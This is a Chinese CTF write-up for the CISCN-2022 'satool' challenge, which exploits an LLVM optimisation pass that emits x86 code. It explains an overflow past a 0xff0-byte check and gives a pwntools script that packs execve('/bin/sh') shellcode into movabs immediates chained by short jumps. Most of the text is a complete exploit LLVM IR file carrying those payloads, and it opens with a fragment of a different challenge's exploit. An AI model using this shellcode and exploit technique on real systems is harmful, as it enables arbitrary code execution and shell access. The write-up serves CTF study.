    trunk234(0x6e);
    trunk235(0);
    
    trunk236(0);
    trunk237(0);
    trunk238(0);
    trunk239(0);
    trunk240(0);
    //修改score
    trunk241(0);
    trunk242(0x40);
    trunk243(0);
    trunk244(0);
    
    trunk245(0);
    trunk246(0);
    trunk247(0);
    trunk248(0);
    trunk249(0);
    trunk250(0);
    trunk251(0);
    trunk252(0);
    trunk253(0);
    trunk254(0);
    trunk255(0);
    
    
    trunk241(0);
    trunk242(0);
    trunk243(0);
    trunk244(0);
    upgrade(0xFF);
    fight(0);
    
}

CISCN-2022 satool

这个确实很难，漏洞点不是很难理解，难的是shellcode怎么写入，目前只能跟着别人wp写一下脚本，就算自己知道思路也很难自己从头开始完成，就先记录一下思路和漏洞，

程序分析

主要是handle进行分析，看样子这个题的漏洞打法是shellcode

readme

## Introduction

A LLVM Pass that can optimize add/sub instructions.

## How to run

opt-12 -load ./mbaPass.so -mba {*.bc/*.ll} -S

## Example

### IR before optimization

```
define dso_local i64 @foo(i64 %0) local_unnamed_addr #0 {
  %2 = sub nsw i64 %0, 2
  %3 = add nsw i64 %2, 68
  %4 = add nsw i64 %0, 6
  %5 = add nsw i64 %4, -204
  %6 = add nsw i64 %5, %3
  ret i64 %6
}
```

### IR after optimization

```
define dso_local i64 @foo(i64 %0) local_unnamed_addr #0 {
  %2 = mul i64 %0, 2
  %3 = add i64 %2, -132
  ret i64 %3
}
```

handle函数

这个函数是倒序处理的，不仅可以从代码中看出，也可以直接写一个脚本(根据readme)

; ModuleID = 'poc.c'
source_filename = "poc.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-pc-linux-gnu"

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i64 @main(i64 %0) #0 {
  %2 = add nsw i64 %0, 286331153
  %3 = add nsw i64 %2, 572662306
}

attributes #0 = { noinline nounwind optnone uwtable "correctly-rounded-divide-sqrt-fp-math"="false" "disable-tail-calls"="false" "frame-pointer"="all" "less-precise-fpmad"="false" "min-legal-vector-width"="0" "no-infs-fp-math"="false" "no-jump-tables"="false" "no-nans-fp-math"="false" "no-signed-zeros-fp-math"="false" "no-trapping-math"="false" "stack-protector-buffer-size"="8" "target-cpu"="x86-64" "target-features"="+cx8,+fxsr,+mmx,+sse,+sse2,+x87" "unsafe-fp-math"="false" "use-soft-float"="false" }

!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.0-4ubuntu1 "}

主要是是一个if ,else if,else的一个结构

第一个if是用来判断指令的第一个操作数是不是常数

else if 是用来判断指令的第一个参数是不是函数参数

如果都不是就会进入else

进入if和else if都会在this中添加 movabs rax ,参数 ret,其中参数占有6个,

else

首先写入movabs rax, 0指令,将i64 %xxx中的操作数xxx（即一个变量）放进v26中,然后进入一个while循环

while循环

退出条件有两个一个是写入的数据大于0xff0二是v26中没有数据(即每个基本块执行一次)在写入一个ret

下面就是弹出两个栈中的参数,根据v26中的参数找到对应的命令行,在判断对应指令的操作符,然后取出指令的两个操作数，再次进入一个if ,else if ,else 判断

1、if 判断

判断第一个指令操作数是不是正负一，如果v18 * v22是1写入指令inc rax 否则是 inc rbx。

如果第一个操作数不是正负一，就会写入指令movabs rbx, v18 * v22

2、else if判断是不是指令的参数

3、if如果既不是常量也不是参数，就压进栈中

4、下面就是对第二个操作数进行操作了，首先是判断是加还是减，然后的操作和上面的基本差不多

调试

发现基本上就两处是我们出入的

首先就是在进入else时都会写入movabs rax,0x0（只会在刚进入时写入一次）

在退出时会写入ret

第二个就是在检查第二个操作数时

写入的效果

漏洞

就是他只检查0xff0个数据，但我们可以输入0x1000个数据，但他初始化中this[4]段中是ret只占一个字节，即使所有字节溢出最后也是ret，但我们可以输入第二次

movabs rax, val

shellcode 写在movabs rax, val中val中这是我们可控的大小8个

第一次输入一定以ret结尾，但我们可以写一个jmp

第二次输入的数据比第一次少就可以执行那个jmp了，下面就是一系列的跳转来调整位置，使其执行shellcode

写shellcode的位置

生成shellcode

from pwn import*
context(os = 'linux', arch = 'amd64')
 
shellcode = [
    "mov edi, 0x68732f6e",
    "shl rdi, 24",
    "mov ebx, 0x69622f",
    "add rdi, rbx",
    "push rdi",
    "push rsp",
    "pop rdi",
    "xor rsi, rsi",
    "xor rdx, rdx",
    "push 59",
    "pop rax",
    "syscall"
]
 
for sc in shellcode:
    print(u64(asm(sc).ljust(6, b'\x90') + b'\xEB\xEB'))//填充为nop指令
 
print(u16(b'\xEB\xE4')) # 最后超出0xff0字节部分的跳转指令

exp

; ModuleID = 'exp.c'
source_filename = "exp.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-pc-linux-gnu"
 
; Function Attrs: noinline nounwind optnone uwtable
define dso_local i64 @payload1(i64 %0) #0 {
  %2 = add nsw i64 %0, 58603
  %3 = add nsw i64 %2, 1024
  %4 = add nsw i64 %3, 1024
  %5 = add nsw i64 %4, 1024
  %6 = add nsw i64 %5, 1024
  %7 = add nsw i64 %6, 1024
  %8 = add nsw i64 %7, 1024
  %9 = add nsw i64 %8, 1024
  %10 = add nsw i64 %9, 1024
  %11 = add nsw i64 %10, 1024
  %12 = add nsw i64 %11, 1024
  %13 = add nsw i64 %12, 1024
  %14 = add nsw i64 %13, 1024
  %15 = add nsw i64 %14, 1024
  %16 = add nsw i64 %15, 1024
  %17 = add nsw i64 %16, 1024
  %18 = add nsw i64 %17, 1024
  %19 = add nsw i64 %18, 1024
  %20 = add nsw i64 %19, 1024
  %21 = add nsw i64 %20, 1024
  %22 = add nsw i64 %21, 1024
  %23 = add nsw i64 %22, 1024
  %24 = add nsw i64 %23, 1024
  %25 = add nsw i64 %24, 1024
  %26 = add nsw i64 %25, 1024
  %27 = add nsw i64 %26, 1024
  %28 = add nsw i64 %27, 1024
  %29 = add nsw i64 %28, 1024
  %30 = add nsw i64 %29, 1024
  %31 = add nsw i64 %30, 1024
  %32 = add nsw i64 %31, 1024
  %33 = add nsw i64 %32, 1024
  %34 = add nsw i64 %33, 1024
  %35 = add nsw i64 %34, 1024
  %36 = add nsw i64 %35, 1024
  %37 = add nsw i64 %36, 1024
  %38 = add nsw i64 %37, 1024
  %39 = add nsw i64 %38, 1024
  %40 = add nsw i64 %39, 1024
  %41 = add nsw i64 %40, 1024
  %42 = add nsw i64 %41, 1024
  %43 = add nsw i64 %42, 1024
  %44 = add nsw i64 %43, 1024
  %45 = add nsw i64 %44, 1024
  %46 = add nsw i64 %45, 1024
  %47 = add nsw i64 %46, 1024
  %48 = add nsw i64 %47, 1024
  %49 = add nsw i64 %48, 1024
  %50 = add nsw i64 %49, 1024
  %51 = add nsw i64 %50, 1024
  %52 = add nsw i64 %51, 1024
  %53 = add nsw i64 %52, 1024
  %54 = add nsw i64 %53, 1024
  %55 = add nsw i64 %54, 1024
  %56 = add nsw i64 %55, 1024
  %57 = add nsw i64 %56, 1024
  %58 = add nsw i64 %57, 1024
  %59 = add nsw i64 %58, 1024
  %60 = add nsw i64 %59, 1024
  %61 = add nsw i64 %60, 1024
  %62 = add nsw i64 %61, 1024
  %63 = add nsw i64 %62, 1024
  %64 = add nsw i64 %63, 1024
  %65 = add nsw i64 %64, 1024
  %66 = add nsw i64 %65, 1024
  %67 = add nsw i64 %66, 1024
  %68 = add nsw i64 %67, 1024
  %69 = add nsw i64 %68, 1024
  %70 = add nsw i64 %69, 1024
  %71 = add nsw i64 %70, 1024
  %72 = add nsw i64 %71, 1024
  %73 = add nsw i64 %72, 1024
  %74 = add nsw i64 %73, 1024
  %75 = add nsw i64 %74, 1024
  %76 = add nsw i64 %75, 1024
  %77 = add nsw i64 %76, 1024
  %78 = add nsw i64 %77, 1024
  %79 = add nsw i64 %78, 1024
  %80 = add nsw i64 %79, 1024
  %81 = add nsw i64 %80, 1024
  %82 = add nsw i64 %81, 1024
  %83 = add nsw i64 %82, 1024
  %84 = add nsw i64 %83, 1024
  %85 = add nsw i64 %84, 1024
  %86 = add nsw i64 %85, 1024
  %87 = add nsw i64 %86, 1024
  %88 = add nsw i64 %87, 1024
  %89 = add nsw i64 %88, 1024
  %90 = add nsw i64 %89, 1024
  %91 = add nsw i64 %90, 1024
  %92 = add nsw i64 %91, 1024
  %93 = add nsw i64 %92, 1024
  %94 = add nsw i64 %93, 1024
  %95 = add nsw i64 %94, 1024
  %96 = add nsw i64 %95, 1024
  %97 = add nsw i64 %96, 1024
  %98 = add nsw i64 %97, 1024
  %99 = add nsw i64 %98, 1024
  %100 = add nsw i64 %99, 1024
  %101 = add nsw i64 %100, 1024
  %102 = add nsw i64 %101, 1024
  %103 = add nsw i64 %102, 1024
  %104 = add nsw i64 %103, 1024
  %105 = add nsw i64 %104, 1024
  %106 = add nsw i64 %105, 1024
  %107 = add nsw i64 %106, 1024
  %108 = add nsw i64 %107, 1024
  %109 = add nsw i64 %108, 1024
  %110 = add nsw i64 %109, 1024
  %111 = add nsw i64 %110, 1024
  %112 = add nsw i64 %111, 1024
  %113 = add nsw i64 %112, 1024
  %114 = add nsw i64 %113, 1024
  %115 = add nsw i64 %114, 1024
  %116 = add nsw i64 %115, 1024
  %117 = add nsw i64 %116, 1024
  %118 = add nsw i64 %117, 1024
  %119 = add nsw i64 %118, 1024
  %120 = add nsw i64 %119, 1024
  %121 = add nsw i64 %120, 1024
  %122 = add nsw i64 %121, 1024
  %123 = add nsw i64 %122, 1024
  %124 = add nsw i64 %123, 1024
  %125 = add nsw i64 %124, 1024
  %126 = add nsw i64 %125, 1024
  %127 = add nsw i64 %126, 1024
  %128 = add nsw i64 %127, 1024
  %129 = add nsw i64 %128, 1024
  %130 = add nsw i64 %129, 1024
  %131 = add nsw i64 %130, 1024
  %132 = add nsw i64 %131, 1024
  %133 = add nsw i64 %132, 1024
  %134 = add nsw i64 %133, 1024
  %135 = add nsw i64 %134, 1024
  %136 = add nsw i64 %135, 1024
  %137 = add nsw i64 %136, 1024
  %138 = add nsw i64 %137, 1024
  %139 = add nsw i64 %138, 1024
  %140 = add nsw i64 %139, 1024
  %141 = add nsw i64 %140, 1024
  %142 = add nsw i64 %141, 1024
  %143 = add nsw i64 %142, 1024
  %144 = add nsw i64 %143, 1024
  %145 = add nsw i64 %144, 1024
  %146 = add nsw i64 %145, 1024
  %147 = add nsw i64 %146, 1024
  %148 = add nsw i64 %147, 1024
  %149 = add nsw i64 %148, 1024
  %150 = add nsw i64 %149, 1024
  %151 = add nsw i64 %150, 1024
  %152 = add nsw i64 %151, 1024
  %153 = add nsw i64 %152, 1024
  %154 = add nsw i64 %153, 1024
  %155 = add nsw i64 %154, 1024
  %156 = add nsw i64 %155, 1024
  %157 = add nsw i64 %156, 1024
  %158 = add nsw i64 %157, 1024
  %159 = add nsw i64 %158, 1024
  %160 = add nsw i64 %159, 1024
  %161 = add nsw i64 %160, 1024
  %162 = add nsw i64 %161, 1024
  %163 = add nsw i64 %162, 1024
  %164 = add nsw i64 %163, 1024
  %165 = add nsw i64 %164, 1024
  %166 = add nsw i64 %165, 1024
  %167 = add nsw i64 %166, 1024
  %168 = add nsw i64 %167, 1024
  %169 = add nsw i64 %168, 1024
  %170 = add nsw i64 %169, 1024
  %171 = add nsw i64 %170, 1024
  %172 = add nsw i64 %171, 1024
  %173 = add nsw i64 %172, 1024
  %174 = add nsw i64 %173, 1024
  %175 = add nsw i64 %174, 1024
  %176 = add nsw i64 %175, 1024
  %177 = add nsw i64 %176, 1024
  %178 = add nsw i64 %177, 1024
  %179 = add nsw i64 %178, 1024
  %180 = add nsw i64 %179, 1024
  %181 = add nsw i64 %180, 1024
  %182 = add nsw i64 %181, 1024
  %183 = add nsw i64 %182, 1024
  %184 = add nsw i64 %183, 1024
  %185 = add nsw i64 %184, 1024
  %186 = add nsw i64 %185, 1024
  %187 = add nsw i64 %186, 1024
  %188 = add nsw i64 %187, 1024
  %189 = add nsw i64 %188, 1024
  %190 = add nsw i64 %189, 1024
  %191 = add nsw i64 %190, 1024
  %192 = add nsw i64 %191, 1024
  %193 = add nsw i64 %192, 1024
  %194 = add nsw i64 %193, 1024
  %195 = add nsw i64 %194, 1024
  %196 = add nsw i64 %195, 1024
  %197 = add nsw i64 %196, 1024
  %198 = add nsw i64 %197, 1024
  %199 = add nsw i64 %198, 1024
  %200 = add nsw i64 %199, 1024
  %201 = add nsw i64 %200, 1024
  %202 = add nsw i64 %201, 1024
  %203 = add nsw i64 %202, 1024
  %204 = add nsw i64 %203, 1024
  %205 = add nsw i64 %204, 1024
  %206 = add nsw i64 %205, 1024
  %207 = add nsw i64 %206, 1024
  %208 = add nsw i64 %207, 1024
  %209 = add nsw i64 %208, 1024
  %210 = add nsw i64 %209, 1024
  %211 = add nsw i64 %210, 1024
  %212 = add nsw i64 %211, 1024
  %213 = add nsw i64 %212, 1024
  %214 = add nsw i64 %213, 1024
  %215 = add nsw i64 %214, 1024
  %216 = add nsw i64 %215, 1024
  %217 = add nsw i64 %216, 1024
  %218 = add nsw i64 %217, 1024
  %219 = add nsw i64 %218, 1024
  %220 = add nsw i64 %219, 1024
  %221 = add nsw i64 %220, 1024
  %222 = add nsw i64 %221, 1024
  %223 = add nsw i64 %222, 1024
  %224 = add nsw i64 %223, 1024
  %225 = add nsw i64 %224, 1024
  %226 = add nsw i64 %225, 1024
  %227 = add nsw i64 %226, 1024
  %228 = add nsw i64 %227, 1024
  %229 = add nsw i64 %228, 1024
  %230 = add nsw i64 %229, 1024
  %231 = add nsw i64 %230, 1024
  %232 = add nsw i64 %231, 1024
  %233 = add nsw i64 %232, 1024
  %234 = add nsw i64 %233, 1024
  %235 = add nsw i64 %234, 1024
  %236 = add nsw i64 %235, 1024
  %237 = add nsw i64 %236, 1024
  %238 = add nsw i64 %237, 1024
  %239 = add nsw i64 %238, 1024
  %240 = add nsw i64 %239, 1024
  %241 = add nsw i64 %240, 1024
  %242 = add nsw i64 %241, 1024
  %243 = add nsw i64 %242, 1024
  %244 = add nsw i64 %243, 1024
  %245 = add nsw i64 %244, 1024
  %246 = add nsw i64 %245, 1024
  %247 = add nsw i64 %246, 1024
  %248 = add nsw i64 %247, 1024
  %249 = add nsw i64 %248, 1024
  %250 = add nsw i64 %249, 1024
  %251 = add nsw i64 %250, 1024
  %252 = add nsw i64 %251, 1024
  %253 = add nsw i64 %252, 1024
  %254 = add nsw i64 %253, 1024
  %255 = add nsw i64 %254, 1024
  %256 = add nsw i64 %255, 1024
  %257 = add nsw i64 %256, 1024
  %258 = add nsw i64 %257, 1024
  %259 = add nsw i64 %258, 1024
  %260 = add nsw i64 %259, 1024
  %261 = add nsw i64 %260, 1024
  %262 = add nsw i64 %261, 1024
  %263 = add nsw i64 %262, 1024
  %264 = add nsw i64 %263, 1024
  %265 = add nsw i64 %264, 1024
  %266 = add nsw i64 %265, 1024
  %267 = add nsw i64 %266, 1024
  %268 = add nsw i64 %267, 1024
  %269 = add nsw i64 %268, 1024
  %270 = add nsw i64 %269, 1024
  %271 = add nsw i64 %270, 1024
  %272 = add nsw i64 %271, 1024
  %273 = add nsw i64 %272, 1024
  %274 = add nsw i64 %273, 1024
  %275 = add nsw i64 %274, 1024
  %276 = add nsw i64 %275, 1024
  %277 = add nsw i64 %276, 1024
  %278 = add nsw i64 %277, 1024
  %279 = add nsw i64 %278, 1024
  %280 = add nsw i64 %279, 1024
  %281 = add nsw i64 %280, 1024
  %282 = add nsw i64 %281, 1024
  %283 = add nsw i64 %282, 1024
  %284 = add nsw i64 %283, 1024
  %285 = add nsw i64 %284, 1024
  %286 = add nsw i64 %285, 1024
  %287 = add nsw i64 %286, 1024
  %288 = add nsw i64 %287, 1024
  %289 = add nsw i64 %288, 1024
  %290 = add nsw i64 %289, 1024
  %291 = add nsw i64 %290, 1024
  %292 = add nsw i64 %291, 1024
  %293 = add nsw i64 %292, 1024
  %294 = add nsw i64 %293, 1024
  %295 = add nsw i64 %294, 1024
  %296 = add nsw i64 %295, 1024
  %297 = add nsw i64 %296, 1024
  %298 = add nsw i64 %297, 1024
  %299 = add nsw i64 %298, 1024
  %300 = add nsw i64 %299, 1024
  %301 = add nsw i64 %300, 1024
  %302 = add nsw i64 %301, 1024
  %303 = add nsw i64 %302, 1024
  %304 = add nsw i64 %303, 1024
  %305 = add nsw i64 %304, 1024
  %306 = add nsw i64 %305, 1024
  %307 = add nsw i64 %306, 1024
  %308 = add nsw i64 %307, 1024
  %309 = add nsw i64 %308, 1024
  %310 = add nsw i64 %309, 1024
  %311 = add nsw i64 %310, 1024
  %312 = add nsw i64 %311, 1024
  %313 = add nsw i64 %312, 1024
  %314 = add nsw i64 %313, 1024
  %315 = add nsw i64 %314, 1024
  ret i64 %315
}
 
; Function Attrs: noinline nounwind optnone uwtable
define dso_local i64 @payload2(i64 %0) #0 {
  %2 = add nsw i64 %0, 1
  %3 = add nsw i64 %2, 1
  %4 = add nsw i64 %3, 1
  %5 = add nsw i64 %4, 1
  %6 = add nsw i64 %5, 1
  %7 = add nsw i64 %6, 16999839996723556031
  %8 = add nsw i64 %7, 16999840167007600968
  %9 = add nsw i64 %8, 16999839549882511291
  %10 = add nsw i64 %9, 16999840169020293448
  %11 = add nsw i64 %10, 16999840169015152727
  %12 = add nsw i64 %11, 16999840169015152724
  %13 = add nsw i64 %12, 16999840169015152735
  %14 = add nsw i64 %13, 16999840169021813064
  %15 = add nsw i64 %14, 16999840169019453768
  %16 = add nsw i64 %15, 16999840169015130986
  %17 = add nsw i64 %16, 16999840169015152728
  %18 = add nsw i64 %17, 16999840169015117071
  %19 = add nsw i64 %18, 1024
  %20 = add nsw i64 %19, 1024
  %21 = add nsw i64 %20, 1024
  %22 = add nsw i64 %21, 1024
  %23 = add nsw i64 %22, 1024
  %24 = add nsw i64 %23, 1024
  %25 = add nsw i64 %24, 1024
  %26 = add nsw i64 %25, 1024
  %27 = add nsw i64 %26, 1024
  %28 = add nsw i64 %27, 1024
  %29 = add nsw i64 %28, 1024
  %30 = add nsw i64 %29, 1024
  %31 = add nsw i64 %30, 1024
  %32 = add nsw i64 %31, 1024
  %33 = add nsw i64 %32, 1024
  %34 = add nsw i64 %33, 1024
  %35 = add nsw i64 %34, 1024
  %36 = add nsw i64 %35, 1024
  %37 = add nsw i64 %36, 1024
  %38 = add nsw i64 %37, 1024
  %39 = add nsw i64 %38, 1024
  %40 = add nsw i64 %39, 1024
  %41 = add nsw i64 %40, 1024
  %42 = add nsw i64 %41, 1024
  %43 = add nsw i64 %42, 1024
  %44 = add nsw i64 %43, 1024
  %45 = add nsw i64 %44, 1024
  %46 = add nsw i64 %45, 1024
  %47 = add nsw i64 %46, 1024
  %48 = add nsw i64 %47, 1024
  %49 = add nsw i64 %48, 1024
  %50 = add nsw i64 %49, 1024
  %51 = add nsw i64 %50, 1024
  %52 = add nsw i64 %51, 1024
  %53 = add nsw i64 %52, 1024
  %54 = add nsw i64 %53, 1024
  %55 = add nsw i64 %54, 1024
  %56 = add nsw i64 %55, 1024
  %57 = add nsw i64 %56, 1024
  %58 = add nsw i64 %57, 1024
  %59 = add nsw i64 %58, 1024
  %60 = add nsw i64 %59, 1024
  %61 = add nsw i64 %60, 1024
  %62 = add nsw i64 %61, 1024
  %63 = add nsw i64 %62, 1024
  %64 = add nsw i64 %63, 1024
  %65 = add nsw i64 %64, 1024
  %66 = add nsw i64 %65, 1024
  %67 = add nsw i64 %66, 1024
  %68 = add nsw i64 %67, 1024
  %69 = add nsw i64 %68, 1024
  %70 = add nsw i64 %69, 1024
  %71 = add nsw i64 %70, 1024
  %72 = add nsw i64 %71, 1024
  %73 = add nsw i64 %72, 1024
  %74 = add nsw i64 %73, 1024
  %75 = add nsw i64 %74, 1024
  %76 = add nsw i64 %75, 1024
  %77 = add nsw i64 %76, 1024
  %78 = add nsw i64 %77, 1024
  %79 = add nsw i64 %78, 1024
  %80 = add nsw i64 %79, 1024
  %81 = add nsw i64 %80, 1024
  %82 = add nsw i64 %81, 1024
  %83 = add nsw i64 %82, 1024
  %84 = add nsw i64 %83, 1024
  %85 = add nsw i64 %84, 1024
  %86 = add nsw i64 %85, 1024
  %87 = add nsw i64 %86, 1024
  %88 = add nsw i64 %87, 1024
  %89 = add nsw i64 %88, 1024
  %90 = add nsw i64 %89, 1024
  %91 = add nsw i64 %90, 1024
  %92 = add nsw i64 %91, 1024
  %93 = add nsw i64 %92, 1024
  %94 = add nsw i64 %93, 1024
  %95 = add nsw i64 %94, 1024
  %96 = add nsw i64 %95, 1024
  %97 = add nsw i64 %96, 1024
  %98 = add nsw i64 %97, 1024
  %99 = add nsw i64 %98, 1024
  %100 = add nsw i64 %99, 1024
  %101 = add nsw i64 %100, 1024
  %102 = add nsw i64 %101, 1024
  %103 = add nsw i64 %102, 1024
  %104 = add nsw i64 %103, 1024
  %105 = add nsw i64 %104, 1024
  %106 = add nsw i64 %105, 1024
  %107 = add nsw i64 %106, 1024
  %108 = add nsw i64 %107, 1024
  %109 = add nsw i64 %108, 1024
  %110 = add nsw i64 %109, 1024
  %111 = add nsw i64 %110, 1024
  %112 = add nsw i64 %111, 1024
  %113 = add nsw i64 %112, 1024
  %114 = add nsw i64 %113, 1024
  %115 = add nsw i64 %114, 1024
  %116 = add nsw i64 %115, 1024
  %117 = add nsw i64 %116, 1024
  %118 = add nsw i64 %117, 1024
  %119 = add nsw i64 %118, 1024
  %120 = add nsw i64 %119, 1024
  %121 = add nsw i64 %120, 1024
  %122 = add nsw i64 %121, 1024
  %123 = add nsw i64 %122, 1024
  %124 = add nsw i64 %123, 1024
  %125 = add nsw i64 %124, 1024
  %126 = add nsw i64 %125, 1024
  %127 = add nsw i64 %126, 1024
  %128 = add nsw i64 %127, 1024
  %129 = add nsw i64 %128, 1024
  %130 = add nsw i64 %129, 1024
  %131 = add nsw i64 %130, 1024
  %132 = add nsw i64 %131, 1024
  %133 = add nsw i64 %132, 1024
  %134 = add nsw i64 %133, 1024
  %135 = add nsw i64 %134, 1024
  %136 = add nsw i64 %135, 1024
  %137 = add nsw i64 %136, 1024
  %138 = add nsw i64 %137, 1024
  %139 = add nsw i64 %138, 1024
  %140 = add nsw i64 %139, 1024
  %141 = add nsw i64 %140, 1024
  %142 = add nsw i64 %141, 1024
  %143 = add nsw i64 %142, 1024
  %144 = add nsw i64 %143, 1024
  %145 = add nsw i64 %144, 1024
  %146 = add nsw i64 %145, 1024
  %147 = add nsw i64 %146, 1024
  %148 = add nsw i64 %147, 1024
  %149 = add nsw i64 %148, 1024
  %150 = add nsw i64 %149, 1024
  %151 = add nsw i64 %150, 1024
  %152 = add nsw i64 %151, 1024
  %153 = add nsw i64 %152, 1024
  %154 = add nsw i64 %153, 1024
  %155 = add nsw i64 %154, 1024
  %156 = add nsw i64 %155, 1024
  %157 = add nsw i64 %156, 1024
  %158 = add nsw i64 %157, 1024
  %159 = add nsw i64 %158, 1024
  %160 = add nsw i64 %159, 1024
  %161 = add nsw i64 %160, 1024
  %162 = add nsw i64 %161, 1024
  %163 = add nsw i64 %162, 1024
  %164 = add nsw i64 %163, 1024
  %165 = add nsw i64 %164, 1024
  %166 = add nsw i64 %165, 1024
  %167 = add nsw i64 %166, 1024
  %168 = add nsw i64 %167, 1024
  %169 = add nsw i64 %168, 1024
  %170 = add nsw i64 %169, 1024
  %171 = add nsw i64 %170, 1024
  %172 = add nsw i64 %171, 1024
  %173 = add nsw i64 %172, 1024
  %174 = add nsw i64 %173, 1024
  %175 = add nsw i64 %174, 1024
  %176 = add nsw i64 %175, 1024
  %177 = add nsw i64 %176, 1024
  %178 = add nsw i64 %177, 1024
  %179 = add nsw i64 %178, 1024
  %180 = add nsw i64 %179, 1024
  %181 = add nsw i64 %180, 1024
  %182 = add nsw i64 %181, 1024
  %183 = add nsw i64 %182, 1024
  %184 = add nsw i64 %183, 1024
  %185 = add nsw i64 %184, 1024
  %186 = add nsw i64 %185, 1024
  %187 = add nsw i64 %186, 1024
  %188 = add nsw i64 %187, 1024
  %189 = add nsw i64 %188, 1024
  %190 = add nsw i64 %189, 1024
  %191 = add nsw i64 %190, 1024
  %192 = add nsw i64 %191, 1024
  %193 = add nsw i64 %192, 1024
  %194 = add nsw i64 %193, 1024
  %195 = add nsw i64 %194, 1024
  %196 = add nsw i64 %195, 1024
  %197 = add nsw i64 %196, 1024
  %198 = add nsw i64 %197, 1024
  %199 = add nsw i64 %198, 1024
  %200 = add nsw i64 %199, 1024
  %201 = add nsw i64 %200, 1024
  %202 = add nsw i64 %201, 1024
  %203 = add nsw i64 %202, 1024
  %204 = add nsw i64 %203, 1024
  %205 = add nsw i64 %204, 1024
  %206 = add nsw i64 %205, 1024
  %207 = add nsw i64 %206, 1024
  %208 = add nsw i64 %207, 1024
  %209 = add nsw i64 %208, 1024
  %210 = add nsw i64 %209, 1024
  %211 = add nsw i64 %210, 1024
  %212 = add nsw i64 %211, 1024
  %213 = add nsw i64 %212, 1024
  %214 = add nsw i64 %213, 1024
  %215 = add nsw i64 %214, 1024
  %216 = add nsw i64 %215, 1024
  %217 = add nsw i64 %216, 1024
  %218 = add nsw i64 %217, 1024
  %219 = add nsw i64 %218, 1024
  %220 = add nsw i64 %219, 1024
  %221 = add nsw i64 %220, 1024
  %222 = add nsw i64 %221, 1024
  %223 = add nsw i64 %222, 1024
  %224 = add nsw i64 %223, 1024
  %225 = add nsw i64 %224, 1024
  %226 = add nsw i64 %225, 1024
  %227 = add nsw i64 %226, 1024
  %228 = add nsw i64 %227, 1024
  %229 = add nsw i64 %228, 1024
  %230 = add nsw i64 %229, 1024
  %231 = add nsw i64 %230, 1024
  %232 = add nsw i64 %231, 1024
  %233 = add nsw i64 %232, 1024
  %234 = add nsw i64 %233, 1024
  %235 = add nsw i64 %234, 1024
  %236 = add nsw i64 %235, 1024
  %237 = add nsw i64 %236, 1024
  %238 = add nsw i64 %237, 1024
  %239 = add nsw i64 %238, 1024
  %240 = add nsw i64 %239, 1024
  %241 = add nsw i64 %240, 1024
  %242 = add nsw i64 %241, 1024
  %243 = add nsw i64 %242, 1024
  %244 = add nsw i64 %243, 1024
  %245 = add nsw i64 %244, 1024
  %246 = add nsw i64 %245, 1024
  %247 = add nsw i64 %246, 1024
  %248 = add nsw i64 %247, 1024
  %249 = add nsw i64 %248, 1024
  %250 = add nsw i64 %249, 1024
  %251 = add nsw i64 %250, 1024
  %252 = add nsw i64 %251, 1024
  %253 = add nsw i64 %252, 1024
  %254 = add nsw i64 %253, 1024
  %255 = add nsw i64 %254, 1024
  %256 = add nsw i64 %255, 1024
  %257 = add nsw i64 %256, 1024
  %258 = add nsw i64 %257, 1024
  %259 = add nsw i64 %258, 1024
  %260 = add nsw i64 %259, 1024
  %261 = add nsw i64 %260, 1024
  %262 = add nsw i64 %261, 1024
  %263 = add nsw i64 %262, 1024
  %264 = add nsw i64 %263, 1024
  %265 = add nsw i64 %264, 1024
  %266 = add nsw i64 %265, 1024
  %267 = add nsw i64 %266, 1024
  %268 = add nsw i64 %267, 1024
  %269 = add nsw i64 %268, 1024
  %270 = add nsw i64 %269, 1024
  %271 = add nsw i64 %270, 1024
  %272 = add nsw i64 %271, 1024
  %273 = add nsw i64 %272, 1024
  %274 = add nsw i64 %273, 1024
  %275 = add nsw i64 %274, 1024
  %276 = add nsw i64 %275, 1024
  %277 = add nsw i64 %276, 1024
  %278 = add nsw i64 %277, 1024
  %279 = add nsw i64 %278, 1024
  %280 = add nsw i64 %279, 1024
  %281 = add nsw i64 %280, 1024
  %282 = add nsw i64 %281, 1024
  %283 = add nsw i64 %282, 1024
  %284 = add nsw i64 %283, 1024
  %285 = add nsw i64 %284, 1024
  %286 = add nsw i64 %285, 1024
  %287 = add nsw i64 %286, 1024
  %288 = add nsw i64 %287, 1024
  %289 = add nsw i64 %288, 1024
  %290 = add nsw i64 %289, 1024
  %291 = add nsw i64 %290, 1024
  %292 = add nsw i64 %291, 1024
  %293 = add nsw i64 %292, 1024
  %294 = add nsw i64 %293, 1024
  %295 = add nsw i64 %294, 1024
  %296 = add nsw i64 %295, 1024
  %297 = add nsw i64 %296, 1024
  %298 = add nsw i64 %297, 1024
  %299 = add nsw i64 %298, 1024
  %300 = add nsw i64 %299, 1024
  %301 = add nsw i64 %300, 1024
  %302 = add nsw i64 %301, 1024
  %303 = add nsw i64 %302, 1024
  %304 = add nsw i64 %303, 1024
  %305 = add nsw i64 %304, 1024
  %306 = add nsw i64 %305, 1024
  %307 = add nsw i64 %306, 1024
  %308 = add nsw i64 %307, 1024
  %309 = add nsw i64 %308, 1024
  %310 = add nsw i64 %309, 1024
  %311 = add nsw i64 %310, 1024
  %312 = add nsw i64 %311, 1024
  %313 = add nsw i64 %312, 1024
  %314 = add nsw i64 %313, 1024
  %315 = add nsw i64 %314, 1024
  %316 = add nsw i64 %315, 1024
  %317 = add nsw i64 %316, 1024
  %318 = add nsw i64 %317, 1024
  ret i64 %318
}
 
attributes #0 = { noinline nounwind optnone uwtable "disable-tail-calls"="false" "frame-pointer"="all" "less-precise-fpmad"="false" "min-legal-vector-width"="0" "no-infs-fp-math"="false" "no-jump-tables"="false" "no-nans-fp-math"="false" "no-signed-zeros-fp-math"="false" "no-trapping-math"="true" "stack-protector-buffer-size"="8" "target-cpu"="x86-64" "target-features"="+cx8,+fxsr,+mmx,+sse,+sse2,+x87" "tune-cpu"="generic" "unsafe-fp-math"="false" "use-soft-float"="false" }
 
!llvm.module.flags = !{!0}
!llvm.ident = !{!1}
 
!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"Ubuntu clang version 12.0.0-3ubuntu1~20.04.5"}

标签：1024,llvm,return,void,i64,add,pass,pwn,nsw
